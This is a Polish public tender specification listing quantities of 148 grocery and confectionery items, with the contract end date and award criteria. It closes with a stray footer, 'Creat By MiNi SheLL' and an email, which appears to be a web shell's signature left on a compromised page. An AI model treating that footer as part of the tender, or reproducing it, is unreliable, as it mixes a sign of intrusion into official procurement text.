Dostawa  pozostałej żywności - 15800000-6 CPV

Lp.
Wyszczególnienie
towaru
Jednostka miary
Ilość 
Cena jednostkowa brutto
( zł)
Wartość Brutto
( zł)
1.
Ananas w puszce 565 g- 
Kier, MK lub równoważne 
szt.
100


2.
Brzoskwinie w syropie w puszce 850 g - Kier lub równoważne 
szt. 
100


3.
Budyń 40g różne smaki 
Winiary, Gellwe lub równoważne
szt.
800


4.
Chipsy cebulowe 250g 
szt. 
5


5.
Chipsy paprykowe 250g.
szt. 
5


6.
Chrupki orzechowe 250g
szt. 
5


7.
Chrupki paprykowe 250g
szt. 
5


8.
Chrzan tarty 160g
szt.
150


 9.
Cukier 1 kg-  biały kryształ 
kg
1500


10
Cukier puder- 500 g 
Diamont lub równoważne
kg
2


11.
Dżem niskosłodzony - 
260 g różne smaki 
szt.
100


12.
Dżem wysokosłodzony - 
260 g różne smaki 
szt.
200


13
Dżemiki jednorazowe 25g
szt.
15


14.
Galaretka 75g różne smaki
Winiary, Gellwe lub równoważne
szt.
300


15.
Groszek konserwowy tradycyjny 400 g, Pudliszki, Kwidzyn 
lub równoważne 
szt.
10


16.
Jabłka suszone 
kg
1


17.
Kawa zbożowa 500 g
kg
80


18.
Ketchup pikantny 500g
Tortex, Kotlin lub równoważne 
szt.
10


19.
Ketchup łagodny 500g
Dawtona, Tortex lub równoważne 
szt.
20


20.
Kisiel 75g  różne smaki  Winiary, Gellwe, lub równoważne
szt.
30


21.
Kokos 100 g 
szt. 
20


22.
Kokos wiórki 
kg
1


23.
Koncentrat  pomidorowy 1780g , Pudliszki lub równoważne 
szt.
150


24.
Kremy różne do tortów 120g- różne
szt.
5


25.
Kukurydza   w puszce 400 g, Dawtona , Kwidzyn lub równoważne 

szt.

80


26.
Majeranek luzem 
kg
2


27.
Mąka ziemniaczana opak.  1 kg
kg
100


28.
Miód sztuczny 370 g
szt.
3


29.
Migdały - 100 g 
Kresto lub równoważne 
szt.
10


30.
Morele suszone
kg
1


31.
Ogórki konserwowe 1l 
Rolnik, Krakus lub równoważne 
szt.
40


32.
Oliwki czarne bezpestkowe 
900 g, Pudliszki lub równoważne 
szt.
2


33.
Oliwki zielone bezpestkowe 
900 g, Pudliszki lub równoważne 
szt.
2


34.
Pieczarki marynowane 370 ml
Rolnik lub równoważne 
szt.
5


35.
Pieprz ziołowy luzem
kg
3


36.
Przyprawa do drobiu 
kg
2


37.
Przyprawa do zup płynie - 1 l,
Winiary lub równoważne 
szt.
250


38.
Przyprawa Kucharek - 1 kg Warzywko lub równoważne
szt.
400


39.
Rodzynki luzem 
kg
2


40.
Rodzynki - 100 g-
Kresto lub równoważne 
szt.
20


41.
Sos do spaghetti w proszku  
szt.
5


42.
Syrop malinowy 500 g 
szt.
60


43.
Śliwka suszona 
kg
1


44.
Śmietana  Fix w proszku 
szt.
5


45.
Śmietana  w proszku  55g
Śnieżka lub równoważne
szt.
5


46.
Śmietanka 80 g 
Cremona lub równoważne
szt.
200


47.
Zaprawa cytrynowa - 1 l
Cytrynka 
szt.
80


48.
Zioła prowansalskie 10 g
szt.
5


49.
Zupa w proszku grochowa, pomidorowa 
kg
3


50.
Zupa w proszku grochowa, pomidorowa - 36 g
szt.
20


51.
Żelatyna wieprzowa  50 g 
szt.
30


52.
Chrupki kukurydziane 250 g
szt.
6


53.
Fasola biała Jaś w opakowaniach 5 kg lub 10 kg 
kg
60


54.
Fasola  kolorowa w opakowaniach 5 kg lub 10 kg 
kg
30


55.
Groch łuskany w opakowaniach
 5 kg lub 10 kg 
kg 
60


56.
Kasza gryczana prażona
kg
80


57.
Kasza jęczmienna średnia 
kg
300


58.
Kasza manna z Młyna 
w Stoisławiu 
kg
150


59.
Kleik ryżowy 180 g 
Bobovita lub równoważne  
szt
3


60.
Kluski na parze, buchty - 300 g
szt.
30


61.
Kolendra 20 g
szt.
10


62.
Konserwy drobiowe- 130 g 
szt.
300


63.
Konserwy turystyczne - 130 g 
szt.
350


64.
Konserwy tyrolskie - 130 g 
szt.
300


65.
Mak luzem 
kg
5


66.
Makaron - cienki nitki 
kg
150


67.
Makaron gruby: kolanka, muszelki
kg
450


68.
Mąka pszenna typ 450 - 1 kg 
kg
600


69.
Mąka razowa  z otrębami ( żytnia)
kg
20


70.
Miód prawdziwy 400 g 
szt.
3


71.
Miodziki jednorazowe 25 g 
szt.
20


72.
Olej uniwersalny 3 l 
szt.
120


73.
Orzechy włoskie łuskane luzem
kg
1


74.
Orzechy włoskie 100 g
Kresto lub równoważne 
szt.
20


75.
Pasztet drobiowy - 160 g
Drosed lub równoważne 
szt.
600


76.
Płatki owsiane górskie  500 g 
kg
60


77.
Ryż  - opak. 1 kg
szt.
400


78.
Soczki małe - 0,2 l w kartoniku 
różne smaki 
szt.
200


79.
Soki owocowe w kartonie- 1l Tymbark, Hortex lub równoważne
szt.
50


80.
Sucharki  450 g
szt.
10


81.
Wafle ryżowe naturalne 130 g.
szt.
10


82.
Aromat do ciast - 10 ml
Delecta lub równoważne 
szt.
8


83.
Baton w czekoladzie - 50 g
Danusia lub równoważne 
szt.
300


84.
Baton w czekoladzie - 50 g
Ikar lub równoważne 
szt.
300


85.
Baton w czekoladzie - 50 g
Maciek lub równoważne 
szt.
300


85.
Bombonierka w czekoladzie 228g Solidarność lub równoważne 
szt.
5


87.
Bombonierka w czekoladzie 300g 
(Wedel, Goplana, Mieszko, Solidarność lub równoważne) 
szt.
5


88.
Ciastka - delicje - 147 g
szt.
150


89.
Ciastka biszkopty luzem
kg
15


90.
Ciastka czekoladowe luzem - różne 
kg
6


91.
Ciastka kruche rogaliki z marmoladą  
kg
5


92.
Ciastka kruche deserowe z cukrem 
kg
10


93.
Ciastka kruche kocie oczka
kg
3


94.
Ciastka kruche markizy 
kg
10


95.
Ciastka kruche maślane 
kg
3


96.
Ciastka kruche rozetki pudrowe 
kg
3


97.
Ciastka kruche ślimaki z marmoladą
kg
3


98.
Ciastka kruche z marmoladą 
kg
10


99.
Ciastka kruche z maszynki
kg
3


100
Cukier waniliowy - 16 g
Dr Oetker lub równoważne 
szt.
100


101
Cukierki landryny - 100 g
szt.
20


102
Cukierki  jajeczka w czekoladzie-
kg
10


103
Cukierki w czekoladzie
 Michałki, lub równoważne 
kg
25


104
Cukierki w czekoladzie- 
 Mieszanka Krakowska,
 lub równoważne 
kg
25


105
Cukierki w czekoladzie- trufle
kg
20


106
 Cukierki zwykłe 
kg
15


107
Cynamon luzem 
kg
2


108
Czekolada dla cukrzyków -100 g
szt.
15


109
Czekolada w proszku -1 kg
Milka lub równoważne 
szt.
1


110
Czekolada nadziewana -100 g - różne smaki - miętowa, jagodowa truskawkowa, Wawel, Wedel, Goplana lub równoważne 
szt.
150


111
Czekolada 100 g - mleczna, gorzka, mleczno-deserowa, 
szt.
400


112
Drożdże 100 g
szt.
10


113
Gałka muszkatałowa 100 g
szt.
10


114
Herbata ekspresowa ( 100 szt)
Saga, Minutka lub równoważne 
opak 
150


115
Herbata granulowana indyjska 
80 g
opak 
1000


116
 Herbata ziołowa - mięta, melisa - 20 saszetek 
opak 
10


117
Herbatniki  148 g - Krakuski, Łakotki lub równoważne 
opak 
50


118
 Kakao - 100 g Wawel, Decomoreno lub równoważne 
szt.
80


119
Kawa naturalna - 100 g
Prima, Gala lub równoważne 
szt.
150


120
Kawa naturalna 250 g
Mk, Premium lub równoważne 
szt.
100


121
Kawa rozpuszczalna 100 g 
Nescafe lub równoważne 
szt.
100


122
Kminek mielony 
kg
4


123
Kocie języczki 100 g
lub równoważne 
szt.
3


124
Krem czekoladowy 350 g 
 Nutella lub równoważne 
szt.
30


125
Liść laurowy luzem 
kg
2


126
Musztarda łagodna, ostra 
szt.
300


127
Ocet spirytusowy - 1 l 
szt
100


128
Orzechy laskowe w czekoladzie 80 g, Jutrzenka lub równoważne 
szt.
20


129
Paluszki solone 80 g
szt.
30


130
Papryka słodka w proszku 
kg
 2


131
Pastylki miętowe w czekoladzie
210 g-Wawel lub równoważne  
szt.
5


132
Pieprz czarny mielony luzem
kg
 3


133
Pierniki lukrowane luzem 
kg
30


134
Pierniki w czekoladzie luzem 
kg
30


135
Proszek do pieczenia 16 g
Dr Oetker lub równoważne 
szt.
20


136
Przyprawa korzenna 20 g
Prymat lub równoważne 
szt.
5


137
Ptasie Mleczko, Milka  350g,  smak śmietankowy, waniliowym
lub równoważne 
szt.
6


138
Rafaello kokosowe, Smakołyk - 150 g lub równoważne 
szt.
3


139
Rodzynki w czekoladzie 100 g
Jutrzenka lub równoważne 
szt.
30


140
Rogalik 80g z nadzieniem waniliowym, czekoladowym, truskawkowym -7 Days, Duble max, Croissant lub równoważne 
szt.
50


141
Soda oczyszczona 15 g
szt.
5


142
Sól spożywcza 1 kg 
szt.
300


143
Wafelki w czekoladzie -50 g
Góralki, Grześki, Princessa, Prince Polo  lub równoważne 
szt.
800


144
Woda gazowana 0,5 l
szt.
50


145
Woda gazowana 1,5 l
szt.
50


146
Woda niegazowana 0,5 l
szt.
100


147
Woda niegazowana 1,5 l
szt.
100


148
Ziele angielskie luz
kg
 3




RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com